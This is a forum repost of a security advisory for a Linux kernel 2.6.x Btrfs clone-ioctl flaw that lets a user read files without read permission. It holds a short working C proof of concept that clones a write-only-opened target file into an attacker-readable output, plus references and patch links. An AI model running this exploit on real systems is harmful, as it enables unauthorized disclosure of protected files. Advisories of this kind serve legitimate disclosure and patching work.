济溪环保公益

 找回密码
 立即注册

微信登录

微信扫一扫,快速登录

搜索
查看: 872|回复: 0

linux kernel实现创建不安全文件漏洞

[复制链接]

35

主题

0

回帖

70

积分

清泉

积分
70
发表于 2011-2-18 22:26:26 | 显示全部楼层 |阅读模式
影响版本:  
Linux kernel 2.6.x  
漏洞描述:   

Linux Kernel是开放源码操作系统Linux所使用的内核。  

Linux Kernel的Btrfs实现中btrfs_ioctl_clone() ioctl将用户所提供的源文件描述符拷贝到了目标文件描述符,但在执行拷贝操作之前没有检查源文件描述符是否已被打开读取,这允许攻击者无需拥有读权限便可读取克隆的文件。<*参考   
https://bugzilla.redhat.com/show ... tiple&id=593226  
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/579585  
*>  
测试方法:  

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#include <fcntl.h>  
#include <sys/ioctl.h>  
#include <stdio.h>  
#include <stdlib.h>  

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)  

int main(int argc, char * argv[])  
{  

if(argc < 3) {  
    printf("Usage: %s [target] [output]\n", argv[0]);  
    exit(-1);  
}  

int output = open(argv[2], O_WRONLY | O_CREAT, 0644);  

/* Note - opened for writing, not reading */  
int target = open(argv[1], O_WRONLY);  

ioctl(output, BTRFS_IOC_CLONE, target);  

}  
安全建议:  
厂商补丁:  

Linux  
-----  
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:  

http://git.kernel.org/?p=linux/k ... fd4d20c8bf1d7fe0395
您需要登录后才可以回帖 登录 | 立即注册 微信登录

本版积分规则

小黑屋|手机版|济溪 ( 京ICP备17053947号-1 )

GMT+8, 2025-6-18 02:15 , Processed in 0.025516 second(s), 25 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表